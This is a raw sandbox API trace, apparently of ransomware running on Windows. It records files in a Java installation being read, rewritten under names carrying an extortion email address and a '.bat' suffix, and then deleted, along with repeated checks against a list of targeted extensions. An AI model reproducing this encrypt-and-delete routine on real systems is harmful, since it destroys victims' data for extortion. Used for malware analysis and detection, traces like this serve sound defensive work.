[0201.909] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.909] GetLastError () returned 0x0 [0201.909] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x414, lpOverlapped=0x0) returned 1 [0201.946] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x420, lpOverlapped=0x0) returned 1 [0201.947] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.947] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xee, lpOverlapped=0x0) returned 1 [0201.947] SetEndOfFile (hFile=0x344) returned 1 [0201.947] CloseHandle (hObject=0x344) returned 1 [0201.947] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.947] SetEndOfFile (hFile=0x3a8) returned 1 [0201.948] CloseHandle (hObject=0x3a8) returned 1 [0201.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.949] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf")) returned 1 [0201.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.949] lstrlenW (lpString=".doc") returned 4 [0201.949] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0201.949] lstrlenW (lpString=".docx") returned 5 [0201.949] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0201.949] lstrlenW (lpString=".pdf") returned 4 [0201.949] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0201.949] lstrlenW (lpString=".xls") returned 4 [0201.949] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0201.949] lstrlenW (lpString=".xlsx") returned 5 [0201.949] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0201.949] lstrlenW (lpString=".ppt") returned 4 [0201.949] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0201.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.949] lstrlenW (lpString=".zip") returned 4 [0201.949] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString=".rar") returned 4 [0201.950] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString=".bz2") returned 4 [0201.950] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString=".7z") returned 3 [0201.950] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.950] lstrlenW (lpString=".dbf") returned 4 [0201.950] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.950] lstrlenW (lpString=".1cd") returned 4 [0201.950] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.950] lstrlenW (lpString=".jpg") returned 4 [0201.950] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.950] lstrlenW (lpString=".doc") returned 4 [0201.950] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString=".docx") returned 5 [0201.950] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0201.950] lstrlenW (lpString=".pdf") returned 4 [0201.950] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString=".xls") returned 4 [0201.950] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0201.950] lstrlenW (lpString=".xlsx") returned 5 [0201.950] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0201.950] lstrlenW (lpString=".ppt") returned 4 [0201.951] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0201.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.951] lstrlenW (lpString=".zip") returned 4 [0201.951] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0201.951] lstrlenW (lpString=".rar") returned 4 [0201.951] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0201.951] lstrlenW (lpString=".bz2") returned 4 [0201.951] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0201.951] lstrlenW (lpString=".7z") returned 3 [0201.951] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.951] lstrlenW (lpString=".dbf") returned 4 [0201.951] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0201.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.951] lstrlenW (lpString=".1cd") returned 4 [0201.951] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0201.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0201.951] lstrlenW (lpString=".jpg") returned 4 [0201.951] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0201.951] lstrcmpiW (lpString1=".pf", lpString2=".bat") returned 1 [0201.951] lstrlenW (lpString="sRGB.pf") returned 7 [0201.951] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.952] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=3144) returned 1 [0201.952] CloseHandle (hObject=0x3a8) returned 1 [0201.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf")) returned 0x20 [0201.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.953] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.953] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.953] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.953] GetLastError () returned 0x0 [0201.953] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xc48, lpOverlapped=0x0) returned 1 [0201.963] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xc50, lpOverlapped=0x0) returned 1 [0201.964] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.964] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe2, lpOverlapped=0x0) returned 1 [0201.965] SetEndOfFile (hFile=0x344) returned 1 [0201.965] CloseHandle (hObject=0x344) returned 1 [0201.965] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.965] SetEndOfFile (hFile=0x3a8) returned 1 [0201.966] CloseHandle (hObject=0x3a8) returned 1 [0201.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.966] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf")) returned 1 [0201.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.966] lstrlenW (lpString=".doc") returned 4 [0201.966] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0201.966] lstrlenW (lpString=".docx") returned 5 [0201.967] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0201.967] lstrlenW (lpString=".pdf") returned 4 [0201.967] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString=".xls") returned 4 [0201.967] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString=".xlsx") returned 5 [0201.967] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0201.967] lstrlenW (lpString=".ppt") returned 4 [0201.967] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.967] lstrlenW (lpString=".zip") returned 4 [0201.967] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString=".rar") returned 4 [0201.967] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString=".bz2") returned 4 [0201.967] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString=".7z") returned 3 [0201.967] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.967] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.967] lstrlenW (lpString=".dbf") returned 4 [0201.967] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.967] lstrlenW (lpString=".1cd") returned 4 [0201.967] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.967] lstrlenW (lpString=".jpg") returned 4 [0201.967] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0201.967] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.968] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.968] lstrlenW (lpString=".doc") returned 4 [0201.968] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString=".docx") returned 5 [0201.968] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0201.968] lstrlenW (lpString=".pdf") returned 4 [0201.968] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString=".xls") returned 4 [0201.968] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString=".xlsx") returned 5 [0201.968] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0201.968] lstrlenW (lpString=".ppt") returned 4 [0201.968] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.968] lstrlenW (lpString=".zip") returned 4 [0201.968] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString=".rar") returned 4 [0201.968] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString=".bz2") returned 4 [0201.968] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString=".7z") returned 3 [0201.968] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.968] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.968] lstrlenW (lpString=".dbf") returned 4 [0201.968] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.968] lstrlenW (lpString=".1cd") returned 4 [0201.968] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0201.968] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0201.968] lstrlenW (lpString=".jpg") returned 4 [0201.969] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0201.969] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0201.969] lstrlenW (lpString="content-types.properties") returned 24 [0201.969] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.969] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=5548) returned 1 [0201.969] CloseHandle (hObject=0x3a8) returned 1 [0201.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties")) returned 0x20 [0201.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.970] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0201.970] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.970] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.970] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.971] GetLastError () returned 0x0 [0201.971] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x15ac, lpOverlapped=0x0) returned 1 [0202.093] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x15b0, lpOverlapped=0x0) returned 1 [0202.094] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0202.094] WriteFile (in: hFile=0x344, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x104, lpOverlapped=0x0) returned 1 [0202.094] SetEndOfFile (hFile=0x344) returned 1 [0202.098] CloseHandle (hObject=0x344) returned 1 [0202.098] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.098] SetEndOfFile (hFile=0x3a8) returned 1 [0202.099] CloseHandle (hObject=0x3a8) returned 1 [0202.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.142] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties")) returned 1 [0202.142] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.142] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.142] lstrlenW (lpString=".doc") returned 4 [0202.142] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.142] lstrlenW (lpString=".docx") returned 5 [0202.142] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.142] lstrlenW (lpString=".pdf") returned 4 [0202.142] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.142] lstrlenW (lpString=".xls") returned 4 [0202.142] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.142] lstrlenW (lpString=".xlsx") returned 5 [0202.142] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.142] lstrlenW (lpString=".ppt") returned 4 [0202.142] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.142] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.142] lstrlenW (lpString=".zip") returned 4 [0202.142] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.142] lstrlenW (lpString=".rar") returned 4 [0202.142] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.142] lstrlenW (lpString=".bz2") returned 4 [0202.142] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.142] lstrlenW (lpString=".7z") returned 3 [0202.143] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.143] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.143] lstrlenW (lpString=".dbf") returned 4 [0202.143] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.143] lstrlenW (lpString=".1cd") returned 4 [0202.143] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.143] lstrlenW (lpString=".jpg") returned 4 [0202.143] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.143] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.143] lstrlenW (lpString=".doc") returned 4 [0202.143] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString=".docx") returned 5 [0202.143] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.143] lstrlenW (lpString=".pdf") returned 4 [0202.143] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString=".xls") returned 4 [0202.143] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString=".xlsx") returned 5 [0202.143] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.143] lstrlenW (lpString=".ppt") returned 4 [0202.143] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.143] lstrlenW (lpString=".zip") returned 4 [0202.143] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString=".rar") returned 4 [0202.143] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.143] lstrlenW (lpString=".bz2") returned 4 [0202.143] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.144] lstrlenW (lpString=".7z") returned 3 [0202.144] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.144] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.144] lstrlenW (lpString=".dbf") returned 4 [0202.144] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.144] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.144] lstrlenW (lpString=".1cd") returned 4 [0202.144] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.144] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0202.144] lstrlenW (lpString=".jpg") returned 4 [0202.144] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.144] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0202.144] lstrlenW (lpString="messages_fr.properties") returned 22 [0202.144] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0202.145] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=3409) returned 1 [0202.145] CloseHandle (hObject=0x344) returned 1 [0202.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties")) returned 0x20 [0202.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.145] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0202.145] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.145] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.145] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0202.146] GetLastError () returned 0x0 [0202.146] ReadFile (hFile=0x344, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0) Thread: id = 95 os_tid = 0xa90 [0178.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3c90968 [0178.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3ca0970 [0178.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddf10 [0178.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c1a0 [0178.080] 